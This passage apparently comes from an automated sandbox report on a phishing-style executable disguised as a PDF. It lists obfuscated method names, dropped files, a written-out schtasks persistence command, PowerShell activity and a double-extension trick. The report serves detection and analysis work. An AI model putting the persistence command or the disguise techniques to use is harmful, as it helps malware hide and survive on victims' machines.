                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, aAXtqtSTtvwGLspYoBZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ybsFhUc9Cb', 'UriFR8w6xe', 'F6dFiQc45Y', 'rGTFpBnJmO', 'kV9FQNK5dp', 'xaRFjuOCF6', 'cdTFCeMH0C'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, mWTkQFSSRoiFTDy9vY7.csHigh entropy of concatenated method names: 'xwrFOCRMvF', 'W8KFzJd2PU', 'vO6kT0e2Vc', 'tdDkSDMvlE', 'Y5okGXQ6n4', 'Btgkb8fZ43', 'fEMk7cnKmU', 'g5ikwFmHe2', 'FcTkBTXdiS', 'dEakWjYUMV'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, s09vsjS7KUlEfIGgpxu.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Siw5suddu8', 'MYo5FPHROc', 'lER5k6w9eL', 'lXK55YZjZk', 'HiV5uRqKhY', 'RS751AneUg', 'uGV5nIX8On'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, YqbkFNeqIB0KxwOq51.csHigh entropy of concatenated method names: 'JL4sAIWZhp', 'jdysUamwWJ', 'cnLssupJce', 'OK0skDUXEF', 'irgsuH28F0', 'eQbsn84gW6', 'Dispose', 'Uy9rBpMRMH', 'csXrWicEiX', 'eb6r3QYXX2'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, WY5FOp4WkFIIAQvMC2.csHigh entropy of concatenated method names: 'DRFsYtKBGd', 'Iivsde1W6i', 'b6YsPsphoe', 'RZ9sXSW0QV', 'p74s95HPex', 'rnwsqoYTRD', 'PbSsZpCpSn', 'QTusK4aNfF', 'SDVsVpS55E', 'uWwsmoIuEh'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, de0thciNrhsqCDPdH7.csHigh entropy of concatenated method names: 'fSn0INZecy', 'ABx0cYIyai', 'Q9U0YXsuLq', 'CRT0dXOIXH', 'XIs0XFbTZN', 'vET09Vpb9Z', 'xAI0ZfEDX2', 'QyC0KP4aBm', 'uvx0m2IRyb', 'e200hqOALR'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, jP6hQDYWNYGmfnrDdp.csHigh entropy of concatenated method names: 'mnYEwTM2Kj', 'fE0EWludhs', 'PJDE6bWK5a', 'gxNEgPE43j', 'hJeEyo3Kop', 'CWe6ayOi5M', 'AaS6LfHaSH', 'YfD6eGntXP', 'iAt6xrT2Ht', 'iH864jpBYN'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, rRGkiiO0AW4v6qmLwf.csHigh entropy of concatenated method names: 'gpPF3jRXyK', 'xiqF6nUFFA', 'AZiFEuZ9dZ', 'IXTFg5ya3m', 'TGxFsBVkQQ', 'J5BFypE2yN', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, Tvu1OdVgGQNNEEUex0.csHigh entropy of concatenated method names: 'yRfg8jUUFP', 'CdIgJDfpT7', 'BwvgMPJafh', 'JtLg2pmeQq', 'hUMgv8CLoR', 'JbCgDI0L02', 'RPCgtEx1w6', 'sItgImfa5Q', 'tL8gcbd9Rk', 'IQJgoQay6o'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, iDd0mAcfQWtuBBMRi6.csHigh entropy of concatenated method names: 'zhA32vy1Io', 'QSR3DtqW1H', 'hKU3IOBHXM', 'njp3cy02fN', 'RAh3A3dX2t', 'cGI3fyRPRt', 'QaR3UZ5hYr', 'Ojw3r1UZoi', 'YNo3s8ouGS', 'D0H3FWee0U'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, gMtVMrotEpDGrlPgLr.csHigh entropy of concatenated method names: 'peI6v1wY3h', 'zKu6tYvg9c', 'QGt3PJinNV', 'BTO3XW0o1U', 'Rcm39IFuM2', 'QXg3qyPlnY', 'Eg13Zay4I1', 'ai43KQOicq', 'uvw3VTK2cQ', 'ahw3mvoXty'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, CICuwYIYM9uBpgQHNv.csHigh entropy of concatenated method names: 'NLdWplfSBY', 'XU9WQilnyK', 'IxxWjvlmqW', 'nExWCliifw', 'No9WaOIOx0', 'IqOWLtoUYv', 'mqKWe5JHR3', 'U1DWxZJ43L', 'oOAW4jqJcX', 'GJcWOBIFtt'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, FdGZLlzEeF8Lj3S1pa.csHigh entropy of concatenated method names: 'WqjFDEkLk4', 'kADFI4vEeO', 'QRhFc5bjrE', 'FlgFY2tOgx', 'FsBFdp6kDQ', 'R3XFXJpyZ3', 'YoBF93ejDW', 'n4iFnUZLsQ', 'GO0F8MSIZX', 'tN6FJEaoCY'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, TjEiRpjmFreNGi1GQE.csHigh entropy of concatenated method names: 'ToString', 'dTRfhGrbAC', 'PE2fdqUD8g', 'FdAfPu3seD', 'k2IfXrc5Yt', 'VgMf9lli5e', 'zx6fqnbgC5', 'DNpfZRXkLY', 'PetfK1ekmX', 'NN9fVnlu1a'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, lit4EtWWNL89DT6iD4.csHigh entropy of concatenated method names: 'Dispose', 'f0KS4xwOq5', 'ND5GdTd3MB', 'Dv1HwnpKf2', 'vfSSOCbmOk', 'UU7Szq6DCj', 'ProcessDialogKey', 'EFeGTY5FOp', 'gkFGSIIAQv', 'zC2GGrRGki'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, NkWkKSGTXYT0MLabEL.csHigh entropy of concatenated method names: 'z7eMX5JHN', 'wo62P05Jg', 'vGmDBirRe', 'IxFtBNJZ3', 'FZBcdNDsB', 'Gv2o2pdu3', 'yyYe0Rf5KTSDBU3Yo2', 'rQbZOSpTxMmEtnxBcf', 'mTWrLWvdu', 'TGYFqFRhj'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, TAL8UFyQqTbGLmT9Io.csHigh entropy of concatenated method names: 'dg2bwPD70r', 'mrMbBJxi1C', 'DaabW5gb7s', 'dEbb3WUmK1', 'PGdb63wPWi', 'EMKbEjWIrZ', 'RfTbgcXM7Q', 'wIrbytXRps', 'zVsbNuUxKr', 'duwbHdtVWC'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, WHhp89Sb61Xw7XCjlZL.csHigh entropy of concatenated method names: 'MklkOsRHp2', 'PuMkzjnsoS', 'LDe5Tkjna6', 'dkleXHt2KcK8WiI2UxB', 'KrYaTHtXmlnVmQLUv5i', 'FS2XsDtPfopDFdEvV9Y', 'SIF7AqtF0w0UXdJhjOt'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, xRG7wVLQfFV1CGtGc8.csHigh entropy of concatenated method names: 'lD6UxSL2U7', 'MdiUO8T72S', 'F65rTsRtQj', 'WgurSfgs9I', 'YLQUhy4rqu', 'FTdURrglbq', 'lSgUiY5H4y', 'adBUpbavjl', 'LbUUQoBnJy', 'CRKUjJr5vo'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, nwj2Pb7n4CIxW3AyM7.csHigh entropy of concatenated method names: 'tgDSgICuwY', 'FM9SyuBpgQ', 'ofQSHWtuBB', 'zRiSl6WMtV', 'mPgSALrgP6', 'OQDSfWNYGm', 'cNgaPs7wwKQi8VsbTd', 'JMV4YVBHpemyg3npZF', 'QraSSthaV5', 'tfWSb1pYhA'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, jriDlbpWiYb4rMfku3.csHigh entropy of concatenated method names: 'h4GAmkscMP', 'YqDARE3gux', 'FtOApk59P9', 'wSTAQQNjM0', 'okjAd1Lcc3', 'u5JAPjHrto', 'LkTAXmrY6A', 'eL6A9t1gxQ', 'Fy3Aq2feL8', 'tGAAZJAJKh'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, LBN5TXZhKBybyrCkrN.csHigh entropy of concatenated method names: 'SMNgBOhmcv', 'ohgg3x6hUu', 'roxgEnopak', 'mGXEOFQZIa', 'qJgEz3bxXh', 'aeVgT3gHYE', 'Pn6gST1YiA', 'sqmgGKB7d7', 'omSgbJ7Wab', 'es0g7CO0NJ'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, aAXtqtSTtvwGLspYoBZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ybsFhUc9Cb', 'UriFR8w6xe', 'F6dFiQc45Y', 'rGTFpBnJmO', 'kV9FQNK5dp', 'xaRFjuOCF6', 'cdTFCeMH0C'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, mWTkQFSSRoiFTDy9vY7.csHigh entropy of concatenated method names: 'xwrFOCRMvF', 'W8KFzJd2PU', 'vO6kT0e2Vc', 'tdDkSDMvlE', 'Y5okGXQ6n4', 'Btgkb8fZ43', 'fEMk7cnKmU', 'g5ikwFmHe2', 'FcTkBTXdiS', 'dEakWjYUMV'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, s09vsjS7KUlEfIGgpxu.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Siw5suddu8', 'MYo5FPHROc', 'lER5k6w9eL', 'lXK55YZjZk', 'HiV5uRqKhY', 'RS751AneUg', 'uGV5nIX8On'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, YqbkFNeqIB0KxwOq51.csHigh entropy of concatenated method names: 'JL4sAIWZhp', 'jdysUamwWJ', 'cnLssupJce', 'OK0skDUXEF', 'irgsuH28F0', 'eQbsn84gW6', 'Dispose', 'Uy9rBpMRMH', 'csXrWicEiX', 'eb6r3QYXX2'
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeFile created: \request for hopper scale and conveyor machine.pdf.exe
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeFile created: \request for hopper scale and conveyor machine.pdf.exe
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeFile created: \request for hopper scale and conveyor machine.pdf.exe
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeFile created: \request for hopper scale and conveyor machine.pdf.exe
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeFile created: \request for hopper scale and conveyor machine.pdf.exe
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeFile created: \request for hopper scale and conveyor machine.pdf.exeJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeFile created: \request for hopper scale and conveyor machine.pdf.exeJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeFile created: \request for hopper scale and conveyor machine.pdf.exeJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeFile created: \request for hopper scale and conveyor machine.pdf.exeJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeFile created: \request for hopper scale and conveyor machine.pdf.exeJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeFile created: C:\Users\user\AppData\Roaming\vmPeKTe.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vmPeKTe" /XML "C:\Users\user\AppData\Local\Temp\tmpDF64.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Uses an obfuscated file name to hide its real file extension (double extension)
                    Source: Possible double extension: pdf.exeStatic PE information: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
